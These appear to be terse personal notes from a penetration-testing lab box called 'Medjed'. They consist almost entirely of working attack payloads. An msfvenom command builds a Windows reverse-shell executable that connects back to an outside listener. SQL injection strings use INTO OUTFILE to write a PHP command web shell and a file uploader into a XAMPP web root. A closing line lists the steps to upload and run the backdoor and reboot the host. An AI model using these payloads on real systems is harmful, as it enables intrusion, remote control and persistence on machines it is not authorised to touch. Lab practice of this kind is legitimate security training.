Medjed -SQL injection - upload file - bd shutdown - exe inject file

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=139 -f exe > bd.exe

' UNION SELECT ("<?php echo passthru($\_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php' -- -'

' UNION SELECT "<?php echo \'<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">\';echo \'<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Done.<b><br><br>\'; }else { echo \'<b>Upload Failed.</b><br><br>\'; }}?>" INTO OUTFILE 'C:/xampp/htdocs/cmd2.php' -- -'

Upload file , tìm root html folder chạy shell listen Inject file bd.exe shutdown /r